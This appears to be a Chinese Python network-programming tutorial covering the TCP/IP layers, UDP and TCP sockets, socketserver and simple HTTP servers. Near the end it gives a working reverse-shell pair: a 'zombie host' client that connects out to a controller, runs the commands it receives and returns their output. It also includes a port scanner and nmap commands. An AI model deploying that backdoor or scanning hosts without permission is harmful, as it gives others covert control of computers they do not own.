官方文档:https://docs.python.org/3/library/ipc.html(进程间通信和网络)
实例代码:https://github.com/lotapp/BaseCode/tree/master/python/6.net
已经讲了很多Python的知识了,那Python能干啥呢?这个是我眼中的Python:
Python方向:
物联网系
(lot
万物互联)安全
与测试
)如果想专攻Web
、爬虫
、物联网
、游戏
等等方向,网络
这块是硬条件,So ==> 不要不急,咱们继续学习~
多句嘴,一般情况下需要什么库就去官方看下,没有再考虑第三方:https://docs.python.org/3/library
技术前景:(注意加粗方向)
Data
LoT
AI
Web
System
小程序
移动端
Web端
高并发
、区块链
)、C(基础
)NetCore
(WebAPI
、EFCore
)总的来说:Python最吃香,Go最有潜力,Web必不可少,NetCore性价比高
现在基本没有单一方向的程序员了,如果有可以默默思考几分钟,一般都是JS
and Python
and (Go
or NetCore
)【二选一】
其他行业:(仅代表逆天个人看法)
影视制作
(剪辑师、合成师、特效师)【目前最火,性价比很高】修图师
(商业修片、影楼后期)【大咖特别多,创业很吃香】UI|UE
(最容易找工作)平面设计
(最常见)室内设计
(高手很吃香)幼儿编程
和中医课
最火琴棋书画武
+国学
需求颇高英语
一直是出国必学新媒体+短视频
出国游
OSI
7层模型¶我用PPT画了个图:(物
数
网
传
会
表
应
)
TCP/IP
4层模型¶物、数
)会、表、应
)我们基本上都是关注这个计算机和计算机网络通信前达成的一种约定,举个例子:以汉语为交流语言
再举个发送文件的例子,PPT做个动画:(自定义协议-文件传输演示)
B/S
基本上都是HTTP
协议,C/S
开发的时候有时会使用自己的协议,比如某大型游戏,比如很多框架都有自己的协议:
redis://
dubbo://
协议总的来说,基本上都是HTTP
协议,对性能要求高的就使用TCP
协议,更高性能要求就自己封装协议了,比如腾讯在UDP
基础上封装了自己的协议来保证通信的可靠性
先看一个老外
的动画(忽略水印广告):https://v.qq.com/x/page/w01984zbrmy.html
以TCP/IP四层协议为例:数据包的逐层封装
和解包
都是操作系统
来做的,我们只管应用层
发送过程:
TCP
段首IP
报头PPT动画示意:
接收过程:
IP
的报头TCP
的段首PPT动画示意:
我们下面按照解包顺序简单说说各种格式:
先看一下这个是啥?用上面动画内容表示:
以太网帧协议:根据MAC
地址完成数据包传递
如果只知道IP,并不知道MAC
地址,可以使用ARP
请求来获取:
ARP
数据报:根据IP
获取MAC
地址(网卡编号)ARP
只适合IPv4
,IPv6
用ICMPV6
来代替ARP
TCP/IP
模型中,ARP
协议属于IP
层;在OSI
模型中,ARP
协议属于链路层PPT画一张图:1bit = 8byte
(1字节=8位)
课后思考:根据ARP原理想想ARP欺骗
到底扎回事?(IP进行ARP请求后会缓存,缓存失效前不会再去ARP请求)
扩展:
RARP 是反向地址转换协议,通过 MAC 地址确定 IP 地址
MAC
地址就是硬件地址,厂商向全球组织申请唯一编号(类似于身份证)先贴一IP段格式图片(网络):
我们在这不去详细讲解,扩展部分有课后拓展,我就说一个大多数人困惑的点:
查看IP
信息的时候经常会看到192.168.36.235/24
,这个/24
一直争议很大
我们来简单解释一下:IP为192.168.36.235
192.168.36
:网络标识235
:主机标识/24
:标识从头数到多少位为止属于网络标识(剩下的就是可分配的主机数了)11111111 11111111 11111111 00000000
(24个1)255.255.255.0
(/多少
就数多少个1,然后转化)扩展:IP属于面向无连接行(IP
协议不保证传输的可靠性,数据包在传输过程中可能丢失,可靠性可以在上层协议或应用程序中提供支持)
面向连接
和面向无连接
区别如图:(图片来自网络)
关于TCP和UDP的内容下次继续~
课外拓展:
图解TCP/IP第五版
链接: https://pan.baidu.com/s/1C4kpNd2MvljxfwTKO082lw 提取码: 7qce
Python网络编程第三版
Code:https://github.com/brandon-rhodes/fopnp
PDF:链接: https://pan.baidu.com/s/1jhW-Te-GCEFKrZVf46S_Tw 提取码: d7fw
网络基础-含书签(网络文档)
链接: https://pan.baidu.com/s/1WZ1D4BthA4qBk2QXBAjm4w 提取码: jmdg
老外讲解网络数据包解析:
下载:https://pan.baidu.com/s/1uUjahs_b05y9Re9ROtzzIw
中文:http://video.tudou.com/v/XMjE3MTg0NzkzNg==.html
英文:http://video.tudou.com/v/XMTkyNjU5NDYwOA==.html
实例代码:https://github.com/lotapp/BaseCode/tree/master/python/6.net/1.UDP
UDP
是无连接的传输协议,不保证可靠性。使用UDP
协议的应用程序需要自己完成丢包重发、消息排序等工作(有点像寄信)
UDP数据包格式:(网络层已经有了ip,传输层就不需要再加上ip了)
在操作系统中查找一个进程可以通过PID
,网络中通过IP
找到主机,再通过Port
找到进程
192.168.36.235:8080
,一般来说,端口的最大位是2^16=65536
看个UDP的简单案例:
import socket
def main():
# AF_INET ==> IPV4;SOCK_STREAM ==> 类型是TCP,stream 流
# SOCK_DGRAM ==> 类型是UDP,dgram 数据报、数据报套接字
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp_sock:
udp_sock.sendto("大兄弟,你好啊".encode("utf-8"), ("192.168.36.235", 8080))
print("over")
if __name__ == '__main__':
main()
接收到的消息:这时候端口是随机的
看起来代码还挺麻烦,我稍微分析下你就知道对比其他语言真的太简单了:
标识:
AF_INET
==> IPV4
SOCK_DGRAM
==> 类型是UDP
SOCK_STREAM
==> 类型是TCP
代码三步走:
udp_sock=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp_sock.sendto(Bytes内容,(IP,Port))
接收:udp_sock.recvfrom(count)
udp_sock.close()
借助调试工具
(点我下载)可以知道:上面程序每次运行,端口都不固定
那怎么使用固定端口呢?==> udp_socket.bind(('', 5400))
import socket
def main():
with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as udp_socket:
# 绑定固定端口
udp_socket.bind(('', 5400))
# 发送消息
udp_socket.sendto("小明,你知道小张的生日吗?\n".encode("utf-8"),
("192.168.36.235", 8080))
print("over")
if __name__ == '__main__':
main()
消息图示:nc -ul 8080
(nc -l
是监听TCP)
调试工具:
先看一个简单版本的:udp_socket.recvfrom(1024)
from socket import socket, AF_INET, SOCK_DGRAM
def main():
with socket(AF_INET, SOCK_DGRAM) as udp_socket:
# 绑定端口
udp_socket.bind(('', 5400))
while True:
# 发送消息
udp_socket.sendto("你可以给我离线留言了\n".encode("utf-8"),
("192.168.36.235", 8080))
# 接收消息(data,(ip,port))
data, info = udp_socket.recvfrom(1024)
print(f"[来自{info[0]}:{info[1]}的消息]:\n{data.decode('utf-8')}")
if __name__ == '__main__':
main()
图示:接收消息(data,(ip,port))
其实如果你使用Nmap
来扫描的话并不能发现nc
打开的UDP
端口:
稍微解释一下:扫描其实就是发了几个空消息过去
-sU
代表扫描UDP,-sT
代表扫描TCP-Pn
这个主要是针对有些服务器禁用ping的处理(ping不通也尝试)-p
指定端口号,如果是所有端口可以使用-p-
sudo
是因为在Ubuntu
下没权限,kali
下可以直接使用nmap
可能有人对nc
输出的你可以给离线留意了
有疑惑,其实就是在给5400端口发空消息的时候~True循环了两次
来张对比图:
扫描TCP和UDP端口:sudo nmap -sTU 192.168.36.235 -Pn
课后扩展:
NC命令扩展:https://www.cnblogs.com/nmap/p/6148306.html
Nmap基础:https://www.cnblogs.com/dunitian/p/5074784.html
如果还是用True循环来实现:
from socket import socket, AF_INET, SOCK_DGRAM
def main():
with socket(AF_INET, SOCK_DGRAM) as udp_socket:
# 绑定端口
udp_socket.bind(('', 5400))
while True:
msg = input("请输入发送的内容:")
if msg == "dotnetcrazy":
break
else:
udp_socket.sendto(
msg.encode("utf-8"), ("192.168.36.235", 8080))
data, info = udp_socket.recvfrom(1024)
print(f"[来自{info[0]}:{info[1]}的消息]:\n{data.decode('utf-8')}")
if __name__ == '__main__':
main()
你会发现,消息不能轮流发送,只能等对方方式后再发,虽然有处理方式,但太麻烦,这时候就可以使用我们之前说的多线程来改写一下了:
from socket import socket, AF_INET, SOCK_DGRAM
from multiprocessing.dummy import Pool as ThreadPool
def send_msg(udp_socket):
while True:
msg = input("输入需要发送的消息:\n")
udp_socket.sendto(msg.encode("utf-8"), ("192.168.36.235", 8080))
def recv_msg(udp_socket):
while True:
data, info = udp_socket.recvfrom(1024)
print(f"[来自{info[0]}:{info[1]}的消息]:\n{data.decode('utf-8')}")
def main():
# 创建一个Socket
with socket(AF_INET, SOCK_DGRAM) as udp_socket:
# 绑定端口
udp_socket.bind(('', 5400))
# 创建一个线程池
pool = ThreadPool()
# 接收消息
pool.apply_async(recv_msg, args=(udp_socket, ))
# 发送消息
pool.apply_async(send_msg, args=(udp_socket, ))
pool.close() # 不再添加任务
pool.join() # 等待线程池执行完毕
print("over")
if __name__ == '__main__':
main()
输出:(就一个注意点~socket在pool之后关闭
)
调试工具功能比较简单,我们手写一个UDP
版的:
from socket import socket, AF_INET, SOCK_DGRAM
from multiprocessing.dummy import Pool as ThreadPool
def get_port(msg):
"""获取用户输入的端口号"""
while True:
port = input(msg)
try:
port = int(port)
except Exception as ex:
print(ex)
else:
return port # 没有错误就退出死循环
def recv_msg(udp_socket):
"""接收消息"""
while True:
data, info = udp_socket.recvfrom(1024)
print(f"[来自{info[0]}:{info[1]}的消息]:\n{data.decode('utf-8')}")
def send_msg(udp_socket):
"""发送消息"""
ip = input("请输入对方IP:")
port = get_port("请输入对方端口号:")
while True:
msg = input("请输入发送的消息:\n")
udp_socket.sendto(msg.encode("utf-8"), (ip, port))
def main():
with socket(AF_INET, SOCK_DGRAM) as udp_socket:
# 绑定端口
udp_socket.bind(('', get_port("请输网络助手的端口号:")))
# 创建一个线程池
pool = ThreadPool()
# 接收消息
pool.apply_async(recv_msg, args=(udp_socket, ))
# 发送消息
pool.apply_async(send_msg, args=(udp_socket, ))
pool.close()
pool.join()
if __name__ == '__main__':
main()
CentOSIP
和Port
(192.168.36.123:5400
)
演示:(多PC演示)
简单说下本机IP的绑定:
Net里面习惯使用localhost
,很多人不知道到底是啥,其实你打开host
文件就可以看到 ==> 127.0.0.1
被重定向为localhost
,在Linux里面也是这样的,每个PC对应的都是lo
回环地址:
本机通信时,对方ip就可以使用127.0.0.1
了,当然了绑定本机ip的时候也可以使用127.0.0.1
(bind(('',))
中的空其实填的就是这个)(很多地方也会使用0.0.0.0
)
_LOCALHOST = '127.0.0.1' # 看这
_LOCALHOST_V6 = '::1'
def socketpair(family=AF_INET, type=SOCK_STREAM, proto=0):
if family == AF_INET:
host = _LOCALHOST # 看这
elif family == AF_INET6:
host = _LOCALHOST_V6
....
lsock = socket(family, type, proto)
try:
lsock.bind((host, 0)) # 看这
lsock.listen()
...
快速实现一下:
using System.Net;
using System.Text;
using System.Net.Sockets;
namespace netcore
{
class Program
{
static void Main(string[] args)
{
// UDP通信
using (var udp_socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp))
{
var ip_addr = IPAddress.Parse("192.168.36.235");
// 绑定本地端口
udp_socket.Bind(new IPEndPoint(ip_addr, 5400));
// UDP发送消息
int i = udp_socket.SendTo(Encoding.UTF8.GetBytes("小明你好啊~"), new IPEndPoint(ip_addr, 8080));
Console.WriteLine($"发送计数:{i}");
}
Console.WriteLine("over");
}
}
}
示例代码:https://github.com/lotapp/BaseCode/tree/master/python/6.net/2.TCP
TCP
是一种面向连接的、可靠的协议,TCP
传输的双方需要首先建立连接,之后由TCP
协议保证数据收发的可靠性,丢失的数据包自动重发,上层应用程序收到的总是可靠的数据流,通讯之后关闭连接(有点像打电话)
用过下载软件的可能遇到过一种‘Bug’
==> 很多人为了防止自己本地文件纳入共享大军,一般都是直接把网络上传给禁了,然后发现文件经常出问题?
其实这个就是TCP
的一个应用,文件一般都很大,所以进行分割后批量下载,那少量的网络上传其实是为了校验一下文件 ==> 正确做法是限制上传速度而不是禁止(学生时代那会还经常蛋疼这个问题,现在想想还挺好玩的O(∩_∩)O
)
大多数连接都是可靠的TCP连接。创建TCP连接时,主动发起连接的叫客户端,被动响应连接的叫服务器
上面那个例子里,我们的下载工具就是客户端,每一小段文件接收完毕后都会向服务器发送一个完成的指令来保证文件的完整性
PS:局域网一般用UDP,互联网一般用TCP(最新研究发现:UDP不是丢包严重,而是包顺序容易出问题)
来看一个简单的入门案例:
from socket import socket
def main():
# 默认就是创建TCP Socket
with socket() as tcp_socket:
# 连接服务器(没有返回值)
tcp_socket.connect(("192.168.36.235", 8080))
# 发送消息(返回发送的字节数)
tcp_socket.send("小张生日快乐~".encode("utf-8"))
# 接收消息
msg = tcp_socket.recv(1024)
print(f"服务器:{msg.decode('utf-8')}")
if __name__ == '__main__':
main()
输出:(socket()
默认就是创建TCP Socket
)
概括来说:
connect
)才能通信(send
,recv
),之后的通信不用再拨号连通了ip
+port
)代码四步走:(TCP客户端其实创建Socket
之后connect
一下服务器就OK了)
tcp_sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcp_sock.connect((IP, Port))
tcp_sock.send(Bytes内容)
接收:tcp_sock.recv(count)
tcp_sock.close()
from socket import socket
def get_buffer(tcp_socket):
buffers = b''
while True:
b = tcp_socket.recv(1024)
if b:
buffers += b
else:
break
# 返回bytes
return buffers
def main():
with socket() as tcp_socket:
# 连接服务器
tcp_socket.connect(("dotnetcrazy.cnblogs.com", 80))
# 发送消息(模拟HTTP)
tcp_socket.send(
b'GET / HTTP/1.1\r\nHost: dotnetcrazy.cnblogs.com\r\nConnection: close\r\n\r\n'
)
# 以"\r\n\r\n"分割一次
header, data = get_buffer(tcp_socket).split(b"\r\n\r\n", 1)
print(header.decode("utf-8"))
with open("test.html", "wb") as f:
f.write(data)
print("over")
if __name__ == '__main__':
main()
输出:(test.html
就是页面源码)
HTTP/1.1 200 OK
Date: Thu, 01 Nov 2018 03:10:48 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 20059
Connection: close
Vary: Accept-Encoding
Cache-Control: private, max-age=10
Expires: Thu, 01 Nov 2018 03:10:58 GMT
Last-Modified: Thu, 01 Nov 2018 03:10:48 GMT
X-UA-Compatible: IE=10
X-Frame-Options: SAMEORIGIN
over
注意\r\n
和Connection:close
;split("",分割次数)
服务端代码相比于UDP,多了一个监听和等待客户端,其他基本上一样:
客户端Code:(如果你想固定端口也可以绑定一下Port
)
from socket import socket
def main():
# 默认就是创建TCP Socket
with socket() as tcp_socket:
# 连接服务器(没有返回值)
tcp_socket.connect(("192.168.36.235", 8080))
print("Connected TCP Server...") # 连接提示
# 发送消息(返回发送的字节数)
tcp_socket.send("小张生日快乐~\n".encode("utf-8"))
# 接收消息
msg = tcp_socket.recv(1024)
print(f"服务器:{msg.decode('utf-8')}")
if __name__ == '__main__':
main()
服务端Code:
from socket import socket
def main():
with socket() as tcp_socket:
# 绑定端口(便于客户端找到)
tcp_socket.bind(('', 8080))
# 变成被动接收消息(监听)
tcp_socket.listen() # 不指定连接最大数则会设置默认值
print("TCP Server is Running...") # 运行后提示
# 等待客户端发信息
client_socket, client_addr = tcp_socket.accept()
with client_socket:
# 客户端连接提示
print(f"[来自{client_addr[0]}:{client_addr[1]}的消息]\n")
# 接收客户端消息
data = client_socket.recv(1024)
print(data.decode("utf-8"))
# 回复客户端
client_socket.send("知道了".encode("utf-8"))
if __name__ == '__main__':
main()
输出:(先运行服务端,再运行客户端。客户端发了一个生日快乐的祝福,服务端回复了一句)
如果像上面那般,并不能多客户端通信
这时候可以稍微改造一下:
from time import sleep
from socket import socket
from multiprocessing.dummy import Pool
def send_msg(tcp_socket):
with tcp_socket:
while True:
try:
tcp_socket.send("小明同志\n".encode("utf-8"))
sleep(2) # send是非阻塞的
print("向服务器问候了一下")
except Exception as ex:
print("服务端连接已断开:", ex)
break
def recv_msg(tcp_socket):
with tcp_socket:
while True:
# 这边可以不捕获异常:
# 服务端关闭时,send_msg会关闭,然后这边也就关闭了
try:
data = tcp_socket.recv(1024)
if data:
print("服务端回复:", data.decode("utf-8"))
except Exception as ex:
print("tcp_socket已断开:", ex)
break
def main():
with socket() as tcp_socket:
# 连接TCP Server
tcp_socket.connect(("192.168.36.235", 8080))
print("Connected TCP Server...") # 连接提示
pool = Pool()
pool.apply_async(send_msg, args=(tcp_socket,))
pool.apply_async(recv_msg, args=(tcp_socket,))
pool.close()
pool.join()
if __name__ == '__main__':
main()
服务器需要同时响应多个客户端的请求,那么每个连接都需要一个新的进程或者线程来处理
from socket import socket
from multiprocessing.dummy import Pool
def wait_client(client_socket, ip_port):
with client_socket:
while True:
data = client_socket.recv(1024)
print(f"[来自{ip_port}的消息]:\n{data.decode('utf-8')}")
client_socket.send(b"I Know") # bytes类型
def main():
with socket() as tcp_socket:
# 绑定端口
tcp_socket.bind(('', 8080))
# 服务器监听
tcp_socket.listen()
print("TCP Server is Running...") # 运行后提示
p = Pool()
while True:
# 等待客户端连接
client_socket, client_addr = tcp_socket.accept()
ip_port = f"{client_addr[0]}:{client_addr[1]}"
print(f"客户端{ip_port}已连接")
# 响应多个客户端则需要多个线程来处理
p.apply_async(wait_client, args=(client_socket, ip_port))
if __name__ == '__main__':
main()
演示:(死循环,Pool
都不用管了)
服务器挂了客户端也会自动退出:
用TCP协议进行Socket
编程在Python中十分简单:
大体流程和Python一样:
using System;
using System.Text;
using System.Net;
using System.Net.Sockets;
using System.Threading.Tasks;
namespace _2_TCP
{
class Program
{
static void Main(string[] args)
{
using (var tcp_socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp))
{
var ip_addr = IPAddress.Parse("192.168.36.235");
// 服务器端绑定Port
tcp_socket.Bind(new IPEndPoint(ip_addr, 8080));
// 服务器监听
tcp_socket.Listen(5);
while (true)
{
// 等待客户端连接
var client_socket = tcp_socket.Accept();
// 远程端口
var client_point = client_socket.RemoteEndPoint;
Task.Run(() =>
{
while (true)
{
byte[] buffer = new byte[1024];
int count = client_socket.Receive(buffer);
Console.WriteLine($"来自{client_socket.RemoteEndPoint.ToString()}的消息:\n{Encoding.UTF8.GetString(buffer, 0, count)}");
client_socket.Send(Encoding.UTF8.GetBytes("知道了~"));
}
});
}
}
}
}
}
using System;
using System.Text;
using System.Net;
using System.Net.Sockets;
namespace client
{
class Program
{
static void Main(string[] args)
{
using (var tcp_socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp))
{
// 连接服务器
tcp_socket.Connect(new IPEndPoint(IPAddress.Parse("192.168.36.235"), 8080));
while (true)
{
// 发送消息
tcp_socket.Send(Encoding.UTF8.GetBytes("服务器你好"));
// 接收服务器消息
byte[] buffer = new byte[1024];
int count = tcp_socket.Receive(buffer);
Console.WriteLine($"来自服务器的消息:{Encoding.UTF8.GetString(buffer, 0, count)}");
}
}
}
}
}
图示:
示例代码:https://github.com/lotapp/BaseCode/tree/master/python/6.net/3.Ext
上面忘记说了,Socket
是可以设置超时时间的,eg:tcp_socket.settimeout(3)
localhost
¶代码不变,如果把TCP客户端的连接服务器IP
空着或者改成127.0.0.1
,咱们再看看效果:tcp_socket.connect(('', 8080))
图示:(怎么样,这回知道本机问啥可以不写IP了吧)
端口扫描大家不陌生,自己实现一个简单的TCP端口扫描工具:
from socket import socket
from multiprocessing.dummy import Pool
ip = "127.0.0.1"
def tcp_port(port):
"""IP:服务端IP,Port:服务端Port"""
with socket() as tcp_socket:
try:
tcp_socket.connect((ip, port))
print(f"[TCP Port:{port} is open]")
except Exception:
pass
def main():
# 查看系统本地可用端口极限值 cat /proc/sys/net/ipv4/ip_local_port_range
max_port = 60999
global ip
ip = input("请输入要扫描的IP地址:")
print(f"正在对IP:{ip}进行端口扫描...")
pool = Pool()
pool.map_async(tcp_port, range(max_port))
pool.close()
pool.join()
if __name__ == '__main__':
main()
输出:(你把端口换成常用端口列表就知道服务器开了哪些服务了)
dnt@MZY-PC:~/桌面/work/BaseCode/python/6.net/3.Ext python3 1.port_scan.py
请输入要扫描的IP地址:192.168.36.235
正在对IP:192.168.36.235进行端口扫描...
[TCP Port:22 is open]
[TCP Port:41004 is open]
dnt@MZY-PC:~/桌面/work/BaseCode/python/6.net/3.Ext sudo nmap -sT 192.168.36.235 -Pn -p-
Starting Nmap 7.60 ( https://nmap.org ) at 2018-11-02 18:15 CST
Nmap scan report for MZY-PC (192.168.36.235)
Host is up (0.000086s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE
22/tcp open ssh
Nmap done: 1 IP address (1 host up) scanned in 2.07 seconds
可以自行研究拓展:
send
、sendto
)和接收(recv
、recvfrom
)都是两个方法?(提示:方法名
、阻塞
)send
和sendall
有啥区别?内网映射
或者ShellCode
实现一个远控课外拓展:
官方Socket编程文档【推荐】
https://docs.python.org/3/library/socket.html
Python核心编程之~网络编程【推荐】
https://wizardforcel.gitbooks.io/core-python-2e/content/19.html
TCP编程知识
https://dwz.cn/dDkXzqcV
网络编程-基础
https://www.jianshu.com/p/55c171ebe5f1
网络编程-UDP
https://www.jianshu.com/p/594870b1634b
网络编程-TCP
https://www.jianshu.com/p/be36d4db5618
Python总结之 recv与recv_from
https://www.jianshu.com/p/5643e810123f
https://blog.csdn.net/xvd217/article/details/38902081
https://blog.csdn.net/pengluer/article/details/8812333
端口扫描扩展:(Python2)
https://thief.one/2018/05/17/1
Python socket借助ngrok建立外网TCP连接
https://www.jianshu.com/p/913b2013a38f
TCP协议知识:
https://www.cnblogs.com/wcd144140/category/1313090.html
上节写了个端口扫描器,这次写个ShellCode
回顾下上节内容
肉鸡端:
#!/usr/bin/env python3
import sys
import subprocess
from socket import socket
def exec(cmd):
try:
process = subprocess.Popen([cmd],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
return process.communicate()
except Exception as ex:
print(ex)
def main():
# 不写死是防止远程服务器被封后就失效
ip = "192.168.1.109" or sys.argv[1]
with socket() as tcp_socket:
# 连接远控服务器
tcp_socket.connect((ip, 8080))
while True:
data = tcp_socket.recv(2048)
if data:
cmd = data.decode("utf-8")
stdout, stderr = exec(cmd)
if stderr:
tcp_socket.send(stderr)
if stdout:
tcp_socket.send(stdout)
if __name__ == "__main__":
main()
服务端:
from socket import socket
def main():
with socket() as tcp_socket:
tcp_socket.bind(('', 8080))
tcp_socket.listen()
client_socket, client_addr = tcp_socket.accept()
with client_socket:
print(f"[肉鸡{client_addr}已经上线:]\n")
while True:
cmd = input("$ ")
client_socket.send(cmd.encode("utf-8"))
data = client_socket.recv(2048)
if data:
print(data.decode("utf-8"))
if __name__ == "__main__":
main()
演示效果:
可能有人会说,肉鸡设置为Server,自己远控登录貌似更简单吧?但是有没有想过:
课后拓展:
如何创建反向Shell来执行远程Root命令
http://os.51cto.com/art/201312/424378.htm
上节留下了一个悬念:有没有更方便的方式来实现服务端?这次揭晓一下:
Python底层其实基于Select
实现了一套SocketServer
,下面来看看:(现在大部分都是epoll
和aio
)
SocketServer
官方图示以及一些常用方法:
+------------+
| BaseServer |
+------------+
|
v
+-----------+ +------------------+
| TCPServer |------->| UnixStreamServer |
+-----------+ +------------------+
|
v
+-----------+ +--------------------+
| UDPServer |------->| UnixDatagramServer |
+-----------+ +--------------------+
__all__ = ["BaseServer", "TCPServer", "UDPServer",
"ThreadingUDPServer", "RequestHandler",
"BaseRequestHandler", "StreamRequestHandler",
"DatagramRequestHandler", "ThreadingMixIn"]
Python全部封装好了,只要继承下BaseRequestHandler
自己定义一下handle
处理方法即可:
from socketserver import BaseRequestHandler, TCPServer
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
data = self.request.recv(2048)
if data:
print(data.decode("utf-8"))
self.request.send(b'HTTP/1.1 200 ok\r\n\r\n<h1>TCP Server Test</h1>')
def main():
with TCPServer(('', 8080), MyHandler) as server:
server.serve_forever() # 期待服务器并执行自定义的Handler方法
# 不启动也可以使用client_socket, client_address = server.get_request()来自定义处理
if __name__ == "__main__":
main()
效果如下:
换个处理器也是很方便的事情,比如这个类文件IO的案例:
SocketServer.StreamRequestHandler
中对客户端发过来的数据是用rfile
属性来处理的,rfile
是一个类file对象
.有缓冲.可以按行分次读取;发往客户端的数据通过wfile
属性来处理,wfile
不缓冲数据,对客户端发送的数据需一次性写入.
服务器:
from time import sleep
from socketserver import TCPServer, StreamRequestHandler
class MyHandler(StreamRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
# 接受来自客户端的IO流( 类似于打开IO,等待对方写)
# self.rfile = self.request.makefile('rb', self.rbufsize)
for line in self.rfile: # 阻塞等
print(f"接受到的数据:{line}")
# 发送给客户端(类似于写给对方)
self.wfile.write(line)
sleep(0.2) # 为了演示方便而加
def main():
with TCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
if __name__ == "__main__":
main()
客户端:
from time import sleep
from socket import socket, SOL_SOCKET, SO_REUSEADDR
def main():
with socket() as tcp_socket:
tcp_socket.connect(('', 8080))
with open("1.tcp.py", "rb") as fs:
while True:
data = fs.readline()
if data:
tcp_socket.send(data)
else:
break
while True:
data = tcp_socket.recv(2048)
if data:
print(data.decode("utf-8"))
sleep(0.2) # 为了演示方便而加
if __name__ == "__main__":
main()
输出:(一行一行显示出来)
其实还可以通过设置其他的类变量来支持一些新的特性:
import socket
from socketserver import TCPServer, StreamRequestHandler
class MyHandler(StreamRequestHandler):
# 可选设置(下面的是默认值)
timeout = 5 # 所有socket超时时间
rbufsize = -1 # 读缓冲区大小
wbufsize = 0 # 写缓冲区大小
disable_nagle_algorithm = False # 设置TCP无延迟选项
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
# 接受来自客户端的IO流(类似于打开IO,等待对方写)
try:
for line in self.rfile: # 阻塞等
print(f"接受到的数据:{line}")
# 发送给客户端(类似于写给对方)
self.wfile.write(line)
except socket.timeout as ex:
print("---" * 10, "网络超时", "---" * 10)
print(ex)
print("---" * 10, "网络超时", "---" * 10)
def main():
with TCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
if __name__ == "__main__":
main()
效果:
业余拓展:
http://a564941464.iteye.com/blog/1170464
https://www.cnblogs.com/txwsqk/articles/2909546.html
https://blog.csdn.net/tycoon1988/article/details/39990403
https://hg.python.org/cpython/file/tip/Lib/socketserver.py
上面说的方法是最基础的,也是单线程的,对于现在这个高并发的时代肯定是吃不消的,那有没有并发模式的呢?
先结合以前并发编程来个案例:(改成多进程也行,Nginx
就是多进程的)
from multiprocessing.dummy import threading
from socketserver import TCPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
data = self.request.recv(2048)
if data:
print(data.decode("utf-8"))
self.request.send(
"HTTP/1.1 200 ok\r\n\r\n<h1>TCP Server</h1>".encode("utf-8"))
if __name__ == "__main__":
with TCPServer(('', 8080), MyHandler) as server:
for _ in range(10): # 指定线程数
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
server.serve_forever()
使用Python封装的方法:(还记得开头贴的一些方法名和类名吗?__all__ = [...]
)
多线程版:(变TCPServer
为ThreadingTCPServer
)
from socketserver import ThreadingTCPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
data = self.request.recv(2048)
if data:
print(data.decode("utf-8"))
self.request.send(
"HTTP/1.1 200 ok\r\n\r\n<h1>TCP Server Threading</h1>".encode("utf-8"))
if __name__ == "__main__":
with ThreadingTCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
多进程版:(变TCPServer
为ForkingTCPServer
)
from socketserver import ForkingTCPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
data = self.request.recv(2048)
if data:
print(data.decode("utf-8"))
self.request.send(
"HTTP/1.1 200 ok\r\n\r\n<h1>TCP Server Forking</h1>".encode("utf-8"))
if __name__ == "__main__":
with ForkingTCPServer(('', 8080), MyHandler) as server:
server.serve_forever()
虽然简单了,但是有一个注意点:
使用fork或线程服务器有个潜在问题就是它们会为每个客户端连接创建一个新的进程或线程。 由于客户端连接数是没有限制的,DDOS可能就需要注意了
如果你担心这个问题,你可以创建一个预先分配大小的工作线程池或进程池。你先创建一个普通的非线程服务器,然后在一个线程池中使用
serve_forever()
方法来启动它们(也就是我们一开始结合并发编程举的例子
)
UDP的就简单提一下,来看个简单案例:
服务器:
from socketserver import UDPServer, BaseRequestHandler
class MyHandler(BaseRequestHandler):
def handle(self):
print(f"[来自{self.client_address}的消息:]\n")
data, socket = self.request
with socket:
if data:
print(data.decode("utf-8"))
socket.sendto("行啊,小张晚上我请你吃~".encode("utf-8"), self.client_address)
def main():
with UDPServer(('', 8080), MyHandler) as server:
server.serve_forever()
if __name__ == "__main__":
main()
客户端:
from socket import socket, AF_INET, SOCK_DGRAM
def main():
with socket(AF_INET, SOCK_DGRAM) as udp_socket:
udp_socket.sendto("小明,今晚去喝碗羊肉汤?".encode("utf-8"), ('', 8080))
data, addr = udp_socket.recvfrom(1024)
print(f"[来自{addr}的消息:]\n")
if data:
print(data.decode("utf-8"))
if __name__ == "__main__":
main()
演示:(想要多线程或者多进程就自己改下名字即可,很简单)
上面使用了Python
帮我们封装的服务器,现在手写一个简单版的Server
:
from socket import socket
def main():
with socket() as tcp_socket:
# 绑定端口
tcp_socket.bind(('', 8080))
# 监听
tcp_socket.listen()
# 等待
client_socket, client_address = tcp_socket.accept()
# 收发数据
with client_socket:
print(f"[来自{client_address}的消息:\n")
msg = client_socket.recv(2048)
if msg:
print(msg.decode("utf-8"))
client_socket.send(
"""HTTP/1.1 200 ok\r\nContent-Type: text/html;charset=utf-8\r\n\r\n<h1>哈哈哈</h1>"""
.encode("utf-8"))
if __name__ == "__main__":
main()
服务器响应:(请求头就靠\r\n\r\n
来分隔了)
浏览器请求:(charset=utf-8
)
参数简单说明下:
setsockopt
:设置socket选项SOL_SOCKET
:设置的级别是socket(里面还有TCP、UDP等)SO_REUSEADDR
:SO
:socketopt
,reuseaddr
:地址复用from socket import socket, SOL_SOCKET, SO_REUSEADDR
def main():
with socket() as tcp_socket:
# 防止端口占用
